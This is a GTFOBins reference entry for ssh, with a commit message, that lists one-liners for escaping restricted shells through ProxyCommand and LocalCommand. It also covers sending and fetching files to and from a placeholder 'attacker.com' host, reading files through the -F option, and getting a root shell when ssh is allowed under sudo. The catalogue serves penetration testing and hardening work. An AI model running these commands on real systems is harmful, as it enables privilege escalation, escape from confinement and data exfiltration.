GTFOBins.github.io/_gtfobins/ssh.md
James Spadaro cd05b58e70
Add LocalCommand option to SSH
SSH has a LocalCommand option that will run a given command on the client machine after a successful connection.  It is generally disabled, but can be enabled on the command line with "-oPermitLocalCommand=yes".  This is useful for bypassing restricted shells.

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-05-01 11:07:53 +02:00

33 lines
1.1 KiB
Markdown

---
functions:
shell:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
- description: Spawn interactive shell on client, requires a successful connection towards `host`.
code: ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
file-upload:
- description: Send local file to a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
file-download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_get
LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH
file-read:
- description: The read file content is corrupted by error prints.
code: |
LFILE=file_to_read
ssh -F $LFILE localhost
sudo:
- description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
---